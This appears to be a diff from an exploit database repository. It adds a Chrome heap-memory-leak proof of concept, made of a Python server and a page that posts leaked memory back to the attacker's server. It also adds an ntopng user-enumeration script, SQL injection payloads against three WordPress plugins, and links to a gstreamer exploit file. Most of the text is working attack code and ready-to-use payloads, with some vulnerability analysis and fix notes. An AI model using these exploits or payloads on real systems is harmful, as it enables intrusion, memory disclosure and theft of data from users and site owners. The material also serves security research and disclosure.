- Download: https://security.appspot.com/security/spc/xcalc_ubuntu_16.04_libc_2.23-0ubuntu3.spc
- Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40943-2.mp3
Impact is mixed. On Ubuntu, the faulty code is installed and on the attack surface by default, if you select the “mp3” option during install -- which I certainly always do. On Fedora, theres a very sensible decision to split gstreamer1-plugins-bad into multiple packages, with only gstreamer1-plugins-bad-free installed by default. This limits the attack surface and does not include Game Music Emu. Of course, the gstreamer framework will happily offer to install gstreamer1-plugins-bad-free-extras, with a very nice UI, if the victim simply tries to open the relevant media file.
As always, the general lack of sandboxing here contributes to the severity. I think we inhabit a world where media parsing sandboxes should be mandatory these days. Theres hope: some of my other recent disclosures appear to have motivated a sandbox for Gnomes tracker (https://bugzilla.gnome.org/show_bug.cgi?id=764786).
Source: https://scarybeastsecurity.blogspot.com/2016/12/redux-compromising-linux-using-snes.html

3
platforms/linux_mips/remote/40740.rb
View file

@ -1,3 +1,4 @@
=begin
# Exploit Title: Eir D1000 Wireless Router - WAN Side Remote Command Injection
# Date: 7th November 2016
# Exploit Author: Kenzo
@ -18,6 +19,8 @@ Proof of Concept
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
=end
require 'msf/core'

308
platforms/multiple/dos/40944.py Executable file
View file

@ -0,0 +1,308 @@
'''
Source: http://blog.skylined.nl/20161219001.html
Synopsis
A specially crafted HTTP response can allow a malicious web-page to trigger a out-of-bounds read vulnerability in Google Chrome. The data is read from the main process' memory.
Known affected software, attack vectors and potential mitigations
Google Chrome up to, but not including, 31.0.1650.48
An attacker would need to get a target user to open a specially crafted web-page. Disabling Java­Script does not prevent an attacker from triggering the vulnerable code path, but may prevent exfiltration of information.
Since the affected code has not been changed since 2009, I assume this affects all versions of Chrome released in the last few years.
Details
The Http­Stream­Parser class is used to send HTTP requests and receive HTTP responses. Its read_­buf_ member is a buffer used to store HTTP response data received from the server. Parts of the code are written under the assumption that the response currently being parsed is always stored at the start of this buffer (as returned by read_­buf_->Start­Of­Buffer()), other parts take into account that this may not be the case (read_­buf_->Start­Of­Buffer() + read_­buf_­unused_­offset_). In most cases, responses are removed from the buffer once they have been parsed and any superfluous data is moved to the beginning of the buffer, to be treated as part of the next response. However, the code special cases HTTP 1xx replies and returns a result without removing the request from the buffer. This means that the response to the next request will not be stored at the start of the buffer, but after this HTTP 1xx response and read_­buf_­unused_­offset_ should be used to find where it starts.
The code that special cases HTTP 1xx responses is:
if (end_­of_­header_­offset == -1) {
<<<snip>>>
} else {
// Note where the headers stop.
read_­buf_­unused_­offset_ = end_­of_­header_­offset;
if (response_->headers->response_­code() / 100 == 1) {
// After processing a 1xx response, the caller will ask for the next
// header, so reset state to support that. We don't just skip these
// completely because 1xx codes aren't acceptable when establishing a
// tunnel.
io_­state_ = STATE_­REQUEST_­SENT;
response_­header_­start_­offset_ = -1;
<<<Note: the code above does not remove the HTTP 1xx response from the
buffer.>>>
} else {
<<<Note: the code that follows either removes the response from the buffer
immediately, or expects it to be removed in a call to
Read­Response­Body later.>>>
<<<snip>>>
return result;
}
A look through the code has revealed one location where this can lead to a security issue (also in Do­Read­Headers­Complete). The code uses an offset from the start of the buffer (rather than the start of the current responses) to pass as an argument to a Do­Parse­Response­Headers.
if (result == ERR_­CONNECTION_­CLOSED) {
<<<snip>>>
// Parse things as well as we can and let the caller decide what to do.
int end_­offset;
if (response_­header_­start_­offset_ >= 0) {
io_­state_ = STATE_­READ_­BODY_­COMPLETE;
end_­offset = read_­buf_->offset();
<<<Note: "end_­offset" is relative to the start of the buffer>>>
} else {
io_­state_ = STATE_­BODY_­PENDING;
end_­offset = 0;
<<<Note: "end_­offset" is relative to the start of the current response
i.e. start + read_­buf_­unused_­offset_.>>>
}
int rv = Do­Parse­Response­Headers(end_­offset);
<<<snip>>>
Do­Parse­Response­Headers passes the argument unchanged to Http­Util::Assemble­Raw­Headers:
int Http­Stream­Parser::Do­Parse­Response­Headers(int end_­offset) {
scoped_­refptr<Http­Response­Headers> headers;
if (response_­header_­start_­offset_ >= 0) {
headers = new Http­Response­Headers(Http­Util::Assemble­Raw­Headers(
read_­buf_->Start­Of­Buffer() + read_­buf_­unused_­offset_, end_­offset));
<<<snip>>>
The Http­Util::Assemble­Raw­Headers method takes two arguments: a pointer to a buffer, and the length of the buffer. The pointer is calculated correctly (in Do­Parse­Response­Headers) and points to the start of the current response. The length is the offset that was calculated incorrectly in Do­Read­Headers­Complete. If the current response is preceded by a HTTP 1xx response in the buffer, this length is larger than it should be: the calculated value will be the correct length plus the size of the previous HTTP 1xx response (read_­buf_­unused_­offset_).
std::string Http­Util::Assemble­Raw­Headers(const char* input_­begin,
int input_­len) {
std::string raw_­headers;
raw_­headers.reserve(input_­len);
const char* input_­end = input_­begin + input_­len;
input_­begin was calculated as read_­buf_->Start­Of­Buffer() + read_­buf_­unused_­offset_,
input_­len was incorrectly calculated as len(headers) + read_­buf_­unused_­offset_,
input_­end will be read_­buf_->Start­Of­Buffer() + 2 * read_­buf_­unused_­offset_ + len(headers)
input_­end is now beyond the end of the actual headers. The code will continue to rely on this incorrect value to try to create a copy of the headers, inadvertently making a copy of data that is not part of this response and may not even be part of the read_­buf_ buffer. This could cause the code to copy data from memory that is stored immediately after read_­buf_ into a string that represents the response headers. This string is passed to the renderer process that made the request, allowing a web-page inside the sandbox to read memory from the main process' heap.
An ASCII diagram might be useful to illustrate what is going on:
read_­buf_: "HTTP 100 Continue\r\n...HTTP XXX Current response\r\n...Unused..."
read_­buf_->Start­Of­Buffer() -----^
read_­buf_->capacity() ----------[================================================================]
read_­buf_->offset() ------------[=======================================================]
read_­buf_­unused_­offset_ -------[=======================]
Do­Read­Headers­Complete/Do­Parse­Response­Headers:
end_­offset ---------------------[=======================================================]
Assemble­Raw­Headers:
input_­begin ---------------------------------------------^
input_­len ----------------------------------------------[========================================###############]
error in input_­len value --------------------------------------------------------------[========###############]
(== read_­buf_­unused_­offset_)
Memory read from the main process' heap ---------------------------------------------------------[##############]
Repro
The below proof-of-concept consist of a server that hosts a simple web-page. This web-page uses XMLHttp­Request to make requests to the server. The server responds with a carefully crafted reply to exploit the vulnerability and leak data from the main process' memory in the HTTP headers of the response. The web-page then uses get­All­Response­Headers() to read the leaked data, and posts it to the server, which displays the memory. The Po­C makes no attempt to influence the layout of the main process' memory, so arbitrary data will be shown and access violation may occur which crash Chrome. With the Po­C loaded in one tab, simply browsing the internet in another might show some leaked information from the pages you visit.
Po­C.py:
'''
import Base­HTTPServer, json, sys, socket;
def sploit(o­HTTPServer, s­Body):
i­Read­Size = 2048;
# The size of the HTTP 1xx response determines how many bytes can be read beyond the next response.
# This HTTP 1xx response is padded to allow reading the desired amount of bytes:
s­First­Response = pad("HTTP/1.1 100 %s\r\n\r\n", i­Read­Size);
o­HTTPServer.wfile.write(s­First­Response);
# The size of the second response determines where in the buffer reading of data beyond the response starts.
# For a new connection, the buffer start empty and grows in 4K increments. If the HTTP 1xx response and the second
# response have a combined size of less then 4K, the buffer will be 4K in size. If the second response is padded
# correctly, the first byte read beyond it will be the first byte beyond the buffer, which increases the chance of
# reading something useful.
s­Second­Response = pad("HTTP/1.1 200 %s\r\nx: x", 4 * 1024 - 1 - len(s­First­Response));
o­HTTPServer.wfile.write(s­Second­Response);
o­HTTPServer.wfile.close();
if s­Body:
s­Leaked­Memory = json.loads(s­Body);
assert s­Leaked­Memory.endswith("\r\n"), \
"Expected CRLF is missing: %s" % repr(s­Leaked­Memory);
as­Leaked­Memory­Chunks = s­Leaked­Memory[:-2].split("\r\n");
s­First­Chunk = None;
for s­Leaked­Memory­Chunk in as­Leaked­Memory­Chunks:
if s­Leaked­Memory­Chunk.startswith("x: x"):
s­First­Chunk = s­Leaked­Memory­Chunk[4:];
if s­First­Chunk:
dump(s­First­Chunk);
as­Leaked­Memory­Chunks.remove(s­Leaked­Memory­Chunk);
if len(as­Leaked­Memory­Chunks) == 1:
print "A CR/LF/CRLF separates the above memory chunk from the below chunk:";
elif len(as­Leaked­Memory­Chunks) > 1:
print "A CR/LF/CRLF separates the above memory chunk from the below chunks, their original order is unknown:";
for s­Leaked­Memory­Chunk in as­Leaked­Memory­Chunks:
dump(s­Leaked­Memory­Chunk);
break;
else:
dump(s­Leaked­Memory);
class Request­Handler(Base­HTTPServer.Base­HTTPRequest­Handler):
def handle_­one_­request(self, *tx­Args, **dx­Args):
try:
return Base­HTTPServer.Base­HTTPRequest­Handler.handle_­one_­request(self, *tx­Args, **dx­Args);
except socket.error:
pass;
def do_­GET(self):
self.do_­GET_­or_­POST();
def do_­POST(self):
self.do_­GET_­or_­POST();
def __send­File­Response(self, i­Code, s­File­Path):
try:
o­File = open(s­File­Path, "rb");
s­Content = o­File.read();
o­File.close();
except:
self.__send­Response(500, "Cannot find %s" % s­File­Path);
else:
self.__send­Response(i­Code, s­Content);
def __send­Response(self, i­Code, s­Content):
self.send_­response(i­Code);
self.send_­header("accept-ranges", "bytes");
self.send_­header("cache-control", "no-cache, must-revalidate");
self.send_­header("content-length", str(len(s­Content)));
self.send_­header("content-type", "text/html");
self.send_­header("date", "Sat Aug 28 1976 09:15:00 GMT");
self.send_­header("expires", "Sat Aug 28 1976 09:15:00 GMT");
self.send_­header("pragma", "no-cache");
self.end_­headers();
self.wfile.write(s­Content);
self.wfile.close();
def do_­GET_­or_­POST(self):
try:
try:
i­Content­Length = int(self.headers.getheader("content-length"));
except:
s­Body = "";
else:
s­Body = self.rfile.read(i­Content­Length);
if self.path in gds­Files:
return self.__send­File­Response(200, gds­Files[self.path]);
elif self.path in gds­Functions:
return gds­Functions[self.path](self, s­Body);
else:
return self.__send­Response(404, "Not found");
except:
self.server.server_­close();
raise;
def pad(s­Template, i­Size):
i­Padding = i­Size - len(s­Template % "");
return s­Template % (i­Padding * "A");
def dump(s­Memory):
as­DWords = []; i­DWord = 0; as­Bytes = []; as­Chars = [];
print "-%s-.-%s-.-%s" % (
("%d DWORDS" % (len(s­Memory) >> 2)).center(35, "-"),
("%d BYTES" % len(s­Memory)).center(47, "-"),
"ASCII".center(16, "-"));
for i­Index in xrange(len(s­Memory)):
s­Byte = s­Memory[i­Index];
i­Byte = ord(s­Byte);
as­Chars.append(0x1f < i­Byte < 0x80 and s­Byte or ".");
as­Bytes.append("%02X" % i­Byte);
i­Bit­Offset = (i­Index % 4) * 8;
i­DWord += i­Byte << i­Bit­Offset;
if i­Bit­Offset == 24 or (i­Index == len(s­Memory) - 1):
as­DWords.append({
0: " %02X",
8: " %04X",
16:" %06X",
24:"%08X"
}[i­Bit­Offset] % i­DWord);
i­DWord = 0;
if (i­Index % 16 == 15) or (i­Index == len(s­Memory) - 1):
print " %-35s | %-47s | %s" % (" ".join(as­DWords), " ".join(as­Bytes), "".join(as­Chars));
as­DWords = []; as­Bytes = []; as­Chars = [];
if __name__ == "__main__":
gds­Files = {
"/": "proxy.html",
}
gds­Functions = {
"/sploit": sploit,
}
tx­Address = ("localhost", 28876);
o­HTTPServer = Base­HTTPServer.HTTPServer(tx­Address, Request­Handler);
print "Serving at: http://%s:%d" % tx­Address;
try:
o­HTTPServer.serve_­forever();
except Keyboard­Interrupt:
pass;
o­HTTPServer.server_­close();
'''
Proxy.html:
<!doctype html>
<html>
<head>
<script>
var i­Threads = 1; // number of simultanious request "threads", higher = faster extraction of data
var i­Delay = 1000; // delay between requests in each "thread", lower = faster extraction of data
function request­Loop(s­Data­To­Send) {
var o­XMLHttp­Request = new XMLHttp­Request();
o­XMLHttp­Request.open("POST", "/sploit", true);
o­XMLHttp­Request.onreadystatechange = function () {
if (o­XMLHttp­Request.ready­State === 4) {
if (o­XMLHttp­Request.status == 200) {
var s­Headers = o­XMLHttp­Request.get­All­Response­Headers();
console.log("response =" + o­XMLHttp­Request.status + " " + o­XMLHttp­Request.status­Text);
console.log("headers =" + s­Headers.length + ":[" + s­Headers + "]");
if (i­Delay > 0) {
set­Timeout(function() {
request­Loop(s­Headers);
}, i­Delay);
} else {
request­Loop(s­Headers);
}
} else {
document.write("Server failed!");
}
}
}
o­XMLHttp­Request.send(s­Data­To­Send ? JSON.stringify(s­Data­To­Send) : "");
}
window.add­Event­Listener("load", function () {
for (var i = 0; i < i­Threads; i++) request­Loop("");
}, true);
</script>
</head>
<body>
</body>
</html>
Exploit
The impact depends on what happens to be stored on the heap immediately following the buffer. Since a web-page can influence the activities of the main process (e.g. it can ask it to make other HTTP requests), a certain amount of control over the heap layout is possible. An attacker could attempt to create a "heap feng shui"-like attack where careful manipulation of the main process' activities allow reading of various types of information from the main process' heap. The most obvious targets that come to mind are http request/response data for different domains, such as log-in cookies, or session keys and function pointers that can be used to bypass ASLR/DEP. There are undoubtedly many other forms of interesting information that can be revealed in this way.
There are little limits to the number of times an attacker can exploit this vulnerability, assuming the attacker can avoid triggering an access violation: if the buffer happens to be stored at the end of the heap, attempts to exploit this vulnerability could trigger an access violation/segmentation fault when the code attempts to read beyond the buffer from unallocated memory addresses.
Fix
I identified and tested two approaches to fixing this bug:
- Fix the code where it relies on the response being stored at the start of the buffer.
This addresses the incorrect addressing of memory that causes this vulnerability in various parts of the code. The design to keep HTTP 1xx responses in the buffer remains unchanged.
- Remove HTTP 1xx responses from the buffer.
There was inline documentation in the source that explained why HTTP 1xx responses were handled in a special way, but it didn't make much sense to me. This fix changes the design to no longer keep the HTTP 1xx response in the buffer. There is an added benefit to this fix in that it removes a potential Do­S attack, where a server responds with many large HTTP 1xx replies, all of which are kept in memory and eventually cause an OOM crash in the main process.
The later fix was eventually implemented.
Time-line
27 September 2013: This vulnerability and two patches were submitted to the Chromium bugtracker.
2 October 2013: A patch for this vulnerability was submitted by Google.
12 November 2013: This vulnerability was address in version 31.0.1650.48.
19 December 2016: Details of this vulnerability are released.
'''

48
platforms/multiple/webapps/40942.py Executable file
View file

@ -0,0 +1,48 @@
# Exploit title: ntopng user enumeration
# Author: Dolev Farhi
# Contact: dolevf at protonmail.com
# Date: 04-08-2016
# Vendor homepage: ntop.org
# Software version: v.2.5.160805
#!/usr/env/python
import os
import sys
import urllib
import urllib2
import cookielib
server = 'ip.add.re.ss'
username = 'ntopng-user'
password = 'ntopng-password'
timeout = 6
if len(sys.argv) < 2:
print("usage: %s <usernames file>") % sys.argv[0]
sys.exit(1)
if not os.path.isfile(sys.argv[1]):
print("%s doesn't exist") % sys.argv[1]
sys.exit(1)
try:
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
login_data = urllib.urlencode({'user' : username, 'password' :
password, 'referer' : '/authorize.html'})
opener.open('http://' + server + ':3000/authorize.html', login_data,
timeout=timeout)
print("\nEnumerating ntopng...\n")
with open(sys.argv[1]) as f:
for user in f:
user = user.strip()
url = 'http://%s:3000/lua/admin/validate_new_user.lua?user=%s&netw
orks=0.0.0.0/0,::/0' % (server, user)
resp = opener.open(url)
if "existing" not in resp.read():
print "[NOT FOUND] %s" % user
else:
print "[FOUND] %s" % user
except Exception as e:
print e
sys.exit(1)

31
platforms/php/webapps/40939.txt Executable file
View file

@ -0,0 +1,31 @@
# Exploit Title: WP Support Plus Responsive Ticket System 7.1.3 WordPress Plugin Sql Injection
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/wp-support-plus-responsive-ticket-system/
# Software Link: https://wordpress.org/plugins/wp-support-plus-responsive-ticket-system/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 7.1.3
# Tested on: Ubuntu 14.04
1 - Description:
Type user access: any user. $_POST[cat_id] is not escaped. Is accessible for any user.
http://lenonleite.com.br/en/blog/2016/12/13/wp-support-plus-responsive-ticket-system-wordpress-plugin-sql-injection/
2 - Proof of Concept:
<form action="http://target/wp-admin/admin-ajax.php" method="post">
<input type="text" name="action" value="wpsp_getCatName">
<input type="text" name="cat_id" value="0 UNION SELECT 1,CONCAT(name,CHAR(58),slug),3 FROM wp_terms WHERE term_id=1">
<input type="submit" name="">
</form>
3 - Timeline:
- 12/12/2016 Discovered
- 13/12/2016 Vendor notifed
- 16/12/2016 Resolve issue version 7.1.5

42
platforms/php/webapps/40940.txt Executable file
View file

@ -0,0 +1,42 @@
# Exploit Title: WP Private Messages 1.0.1 Plugin WordPress Sql Injection
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/wp-private-messages/
# Software Link: https://wordpress.org/plugins/wp-private-messages/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 1.0.1
# Tested on: Ubuntu 14.04
1 - Description:
Type user access: registered user.
$_GET[id] is not escaped. Url is accessible for every registered user.
http://lenonleite.com.br/en/blog/2016/12/16/wp-private-messages-1-0-1-plugin-wordpress-sql-injection/
2 - Proof of Concept:
1 Login as regular user (created using wp-login.php?action=register):
2 -Using :
http://target/wp-admin/users.php?page=wp-private-messages%2Fwpu_private_messages.php&wpu=readid=0+UNION+SELECT+1,2,2,name,slug,6,7,8,9,10,11,12+FROM+wp_terms+WHERE++term_id%3D1&r=recieved
Obs: Use id number of your user in third column after word select. For example:
…UNION+SELECT+1,2,1,name,slug…
…UNION+SELECT+1,2,2,name,slug…
…UNION+SELECT+1,2,3,name,slug…
…UNION+SELECT+1,2,4,name,slug…
…UNION+SELECT+1,2,5,name,slug…
3 - Timeline:
12/12/2016 Discovered
13/12/2016 Vendor not finded

28
platforms/php/webapps/40941.txt Executable file
View file

@ -0,0 +1,28 @@
# Exploit Title: Unauthenticated SQL injeciton in 404 plugin for Wordpress v1.0
# Google Dork: N/A
# Date: 17/12/2016
# Exploit Author: Ahmed Sherif (Deloitte)
# Vendor Homepage: N/A
# Software Link: https://wordpress.org/plugins/404-redirection-manager/
# Version: V1.0
# Tested on: Linux Mint
# CVE : N/A
The plugin does not properly sanitize the user input. Hence, it was
vulnerable to SQL injection.
The vulnerable page is : custom/lib/cf.SR_redirect_manager.class.php on line 356
[#] Proof of Concept (PoC):
GET /path-to-wordpress/%27%29%20AND%20%28SELECT%20%2a%20FROM%20%28SELECT%28SLEEP%285-%28IF%28%27a%27%3D%27a%27%2C0%2C5%29%29%29%29%29FPYG%29%20AND%20%28%27SQL%27%3D%27SQL
HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: wp-settings-time-1=1480877693
Connection: close*